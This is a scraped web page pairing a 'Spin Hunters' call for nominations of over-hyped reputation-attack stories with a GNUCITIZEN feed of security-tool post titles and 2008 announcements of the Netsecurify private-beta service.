Spin Hunters is eager to rate the most popular cases of reputation attacks in the last year. Whether this will be the hysterical speculations over the upcoming election or the intensive rumors about the crush of a big financial institution, it is up to you decide. Therefore if you suspect that some of the current affairs are part of a malicious Black PR plot or you know this for sure, please submit your nominations by emailing us. At the end of the year, we will honor the most over-hyped stories by giving them a special award and public rebuke.
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



Netsecurify Screenshots
noreply@blogger.com (pdp) — Sun, 26 Oct 2008 09:10:00 +0000
        



Try Netsecurify
noreply@blogger.com (pdp) — Mon, 20 Oct 2008 13:11:00 +0000
The Netsecurify service is still in private-beta which means that we are only offering it for free to our friends, our clients and selected members of the public. We are also willing to open it for prime time use to organizations with low security budget, charity organizations and others who might be in need. Please, get in touch with us if you want to try it out.


Beginning
noreply@blogger.com (pdp) — Thu, 11 Sep 2008 12:49:00 +0000
Today is the day. Netsecurify officially launches today.